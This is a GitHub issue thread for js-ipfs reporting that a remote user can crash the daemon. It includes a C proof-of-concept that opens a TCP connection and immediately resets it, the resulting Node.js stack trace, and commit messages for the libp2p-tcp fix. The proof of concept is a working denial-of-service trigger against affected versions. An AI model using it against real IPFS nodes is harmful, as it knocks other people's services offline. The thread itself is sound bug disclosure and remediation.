Skip to content
This repository has been archived by the owner on Feb 12, 2024. It is now read-only.

Daemon can be crashed by remote user #1447

Closed
0xall opened this issue Jul 17, 2018 · 1 comment · Fixed by libp2p/js-libp2p-tcp#96
Closed

Daemon can be crashed by remote user #1447

0xall opened this issue Jul 17, 2018 · 1 comment · Fixed by libp2p/js-libp2p-tcp#96
Labels
exp/wizard Extensive knowledge (implications, ramifications) required kind/bug A bug in existing code (including security flaws) P1 High: Likely tackled by core team if no one steps up

Comments

@0xall
Copy link
Contributor

0xall commented Jul 17, 2018

  • Version: 0.30.0
  • Platform: Darwin (Mac OS) High Sierra 10.13.5
  • Subsystem: libp2p

Type: Bug

Severity:

Description:

The below program coded by C language crashes remote js-ipfs daemon. It just connects with
a daemon (by TCP) and directly closes the connection with RST(reset) flag. It needs IP address and port of remote daemon.

Steps to reproduce the error:

  • Copy and compile below c code. (I think it could be compiled only on linux or darwin os)
  • Run it.
  • Input IP address and port of the remote daemon to crash
#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char const *argv[])
{
    int sock = 0;
    struct sockaddr_in serv_addr;
    char ipStr[1024];
    int port;

    printf("Input IP Address : ");
    scanf("%s", ipStr);

    printf("Input port : ");
    scanf("%d", &port);

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("\n Socket creation error \n");
        return -1;
    }
  
    memset(&serv_addr, '0', sizeof(serv_addr));
  
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(port);
      
    if(inet_pton(AF_INET, ipStr, &serv_addr.sin_addr)<=0) 
    {
        printf("\nInvalid address/ Address not supported \n");
        return -1;
    }
  
    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
    {
        printf("\nConnection Failed \n");
        return -1;
    }

    struct linger sl;
    sl.l_onoff = 1;
    sl.l_linger = 0;
    setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));

    printf("sent\n");
    shutdown(sock, 1);
    return 0;
}

I run the program with

Input IP Address : 127.0.0.1
Input port : 4002
sent

and crashed by error like below

/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/convert.js:72
  if (!ipaddr.isValid()) throw new Error('invalid ip address')
                         ^

Error: invalid ip address
    at ip2buf (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/convert.js:72:32)
    at Function.convertToBuffer [as toBuffer] (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/convert.js:49:14)
    at /usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:85:35
    at arrayMap (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/lodash.map/index.js:140:21)
    at map (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/lodash.map/index.js:1836:10)
    at stringTuplesToTuples (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:79:10)
    at stringToBuffer (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:171:13)
    at Object.fromString (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:178:10)
    at ClassIsWrapper.withIs.proto.className (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/index.js:40:25)
    at new Multiaddr (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/class-is/index.js:40:33)
@alanshaw alanshaw added kind/bug A bug in existing code (including security flaws) exp/wizard Extensive knowledge (implications, ramifications) required status/ready Ready to be worked P1 High: Likely tackled by core team if no one steps up labels Jul 17, 2018
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 23, 2018
@TomCoded
fix: "invalid ip address" "daemon can be crashed by remote user"
b2aebde 
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit terminates processing of a destroyed socket before multiaddr
causes the crash.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
@TomCoded TomCoded mentioned this issue Jul 23, 2018
Merged
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 23, 2018
@TomCoded
fix: "invalid ip address" "daemon can be crashed by remote user"
b458077 
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit terminates processing of a destroyed socket before multiaddr
causes the crash.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 23, 2018
@TomCoded
fix: invalid ip address and daemon can be crashed by remote user
9370155 
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit terminates processing of a destroyed socket before multiaddr
causes the crash.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
@alanshaw alanshaw added status/in-progress In progress and removed status/ready Ready to be worked labels Jul 29, 2018
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 31, 2018
@TomCoded
fix: invalid ip address and daemon can be crashed by remote user
a4d7fe1 
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit catches the exception in get-multiaddr and returns an
undefined value to listener rather than throwing an exception when
trying to process defective or destroyed socket data. Listener then
terminates processing of the incoming p2p connections that generate
this error condition.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 31, 2018
@TomCoded
fix: invalid ip address and daemon can be crashed by remote user
6010e59 
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit catches the exception in get-multiaddr and returns an
undefined value to listener rather than throwing an exception when
trying to process defective or destroyed socket data. Listener then
terminates processing of the incoming p2p connections that generate
this error condition.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 31, 2018
@TomCoded
fix: invalid ip address and daemon can be crashed by remote user
4fb70be 
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit catches the exception in get-multiaddr and returns an
undefined value to listener rather than throwing an exception when
trying to process defective or destroyed socket data. Listener then
terminates processing of the incoming p2p connections that generate
this error condition.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
jacobheun pushed a commit to libp2p/js-libp2p-tcp that referenced this issue Jul 31, 2018
@TomCoded
fix: invalid ip address and daemon can be crashed by remote user
4b04b17 
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit catches the exception in get-multiaddr and returns an
undefined value to listener rather than throwing an exception when
trying to process defective or destroyed socket data. Listener then
terminates processing of the incoming p2p connections that generate
this error condition.

fixes: #93
fixes: ipfs/js-ipfs#1447
@ghost ghost removed the status/in-progress In progress label Jul 31, 2018
@jacobheun
Copy link
Contributor

libp2p-tcp 0.12.1 has been released and should resolve the crash.

This was referenced Sep 15, 2021
Open
Open
This was referenced Jan 15, 2024
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
This was referenced Jan 16, 2024
Open
Open
Open
Open
Open
Open
Open
Open
This was referenced Feb 11, 2024
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
exp/wizard Extensive knowledge (implications, ramifications) required kind/bug A bug in existing code (including security flaws) P1 High: Likely tackled by core team if no one steps up
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

fix: "invalid ip address" "daemon can be crashed by remote user" TomCoded/js-libp2p-tcp
3 participants
@alanshaw @jacobheun @0xall